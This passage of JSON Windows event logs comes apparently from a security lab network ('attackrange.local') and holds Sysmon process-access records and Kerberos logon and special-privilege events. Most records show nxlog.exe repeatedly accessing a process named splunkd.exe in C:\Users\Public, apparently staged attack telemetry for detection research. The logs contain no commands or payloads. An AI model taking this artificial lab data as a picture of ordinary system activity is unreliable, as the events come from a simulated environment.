C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:40.516","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220444,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x66804\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x66804","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:54:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220445,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x66804\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{84587115-398E-4BE5-5705-9593D4B595D1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::bd2f:79cc:df6c:109f\r\n\tSource Port:\t\t52643\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x66804","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{84587115-398E-4BE5-5705-9593D4B595D1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::bd2f:79cc:df6c:109f","IpPort":"52643","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:54:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4668,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:41.517\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:41.517","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:42","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4669,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:42.517\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:42.517","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4670,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:43.517\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:43.517","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4671,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:44.518\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:44.518","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:45","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4672,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:45.518\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: 